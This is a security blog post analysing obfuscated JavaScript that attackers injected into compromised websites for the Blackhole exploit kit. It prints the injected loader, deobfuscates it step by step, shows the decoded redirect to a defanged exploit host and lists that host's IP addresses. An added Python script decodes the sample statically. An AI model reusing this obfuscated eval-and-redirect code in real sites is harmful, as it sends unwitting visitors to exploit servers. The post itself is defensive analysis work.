Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday 2 October 2012

Blackhole exploit: Compromised sites

Looking at a recent case of a compromised site, I noticed something rather surprising: they're not even bothering to make the code difficult to decode. I'm pondering, of course, whether this is deliberate, due to the changes in v2.0 of the Blackhole exploit kit (others have already written about that [1] [2], so I won't go into it here), but even if that is the case, the choice of far less complex code on compromised sites is puzzling to say the least.

In this case, the code inserted into the compromised site is as follows (I've formatted it for readability):

v="v"+"a"+"l";
try
{
        faweb++
}
catch(btawetb)
{
        try
        {
                sbgesrb+325
        }
        catch(btawt4)
        {
                w=window;
                e=w["e"+v];
        }
}
if(1)
{
        f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
        j=i;
        if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
        gbrgbdf&236;
}
catch(asga)
{
        e("if(1)"+s+"");
}


To decode this, all you need to do is modify it as follows (the try/catch blocks and the octal/hex comparisons are only there to confuse a casual reader: the undefined references always throw, so control always reaches window["eval"], and 031==0x19 and 0x10==020 are always true):

v="v"+"a"+"l";
e=eval;                      // what the try/catch dance resolves to: window["e"+"val"]
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
w=f;                         // one number per output character, each stored (index mod 3) too low
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)      // 111 iterations, one per array element
{
    j=i;
    s=s+r.fromCharCode((1*w[j]+e(x+3)));   // e("j%3") is j%3, so each char = w[j] + (j % 3)
}
// The sample ends with e(s), which would execute the decoded payload (a document.location
// redirect) if run in a real browser; a decoder that overrides eval() prints it instead.
// Displaying the string directly avoids running it at all.
console.log(s);


Which gives us the following (I've defanged the URL so that it isn't auto-hyperlinked):

var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}
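The same decoding done statically, as an added example that is not from the post: a small Python script that reads the character-code array and the j%N offset out of the injected script and rebuilds the string with plain arithmetic, never evaluating any of it, then defangs the resulting URL for reporting. The array and loop are copied from the sample above; the function names and the regex-based extraction are my own.

```python
import re

# Fragment of the injected script from the post, with the character-code
# array copied verbatim (line-wrapped only) and the loop that consumes it.
SAMPLE = """f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,
103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,
110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,
110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,
48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,
44,112,103,110,34,58,123);
x="j%";
for(i=0;-i+111!=0;i+=1){j=i;s=s+r.fromCharCode((1*w[j]+e(x+3)));}
"""

def decode_static(script):
    """Rebuild the string the sample's loop would produce, without running it.

    The loop computes w[j] + eval("j%" + N) for each index j, so every code
    was stored N-aligned low. We read N from the e(x+N) call and the codes
    from the Array literal, then apply the offset with integer arithmetic.
    """
    arr = re.search(r"new Array\(([\d,\s]+)\)", script)
    mod = re.search(r'x="j%";.*?e\(x\+(\d+)\)', script, re.S)
    if not arr or not mod:
        raise ValueError("script does not match the Array / j%N pattern")
    codes = [int(n) for n in arr.group(1).split(",")]
    n = int(mod.group(1))
    return "".join(chr(c + j % n) for j, c in enumerate(codes))

def defang_urls(text):
    """Neutralise URLs for reporting: http -> hxxp and '.' -> '[.]' in the host."""
    def fix(m):
        scheme, host, rest = m.group(1), m.group(2), m.group(3)
        return scheme.replace("http", "hxxp") + host.replace(".", "[.]") + rest
    return re.sub(r"(https?://)([^/\s\"']+)([^\s\"']*)", fix, text)

if __name__ == "__main__":
    print(defang_urls(decode_static(SAMPLE)))
```

Because the offset is read from the script rather than hard-coded, the same function handles samples that use a different modulus in the e(x+N) call.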


In this case, onlinebayunator.ru is residing at:

70.38.31.71 - AS32613 70.38.0.0/17 IWEB-AS - iWeb Technologies Inc.
202.3.245.13 - AS9471 202.3.245.0/24 MANA-PF-AP MANA S.A.
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network

Other domains known to have lived (most are now, thankfully, dead) or to be living on these IPs include:



hpHosts, Malware Domain List and Malwarebytes Anti-Malware users will be pleased to know that the IPs/domains are already blocked.

Incidentally, onlinebayunator.ru was resolving to the following yesterday (1st October), and nope, I'm not surprised to see CB3ROB's IP space making an appearance either:

84.22.100.108 - mail.cyberbunker.com - AS34109 84.22.96.0/19 AS34109 CB3ROB Ltd. & Co. KG
190.10.14.196 - cb9.creationsbank.com - AS3790 190.10.0.0/17 RADIOGRAFICA COSTARRICENSE
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network

References

Malware Domain List - Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=218.0

Malzilla (open source)
http://malzilla.sourceforge.net

1 comment:

Enchufe said...

How could my site be infected by this exploit?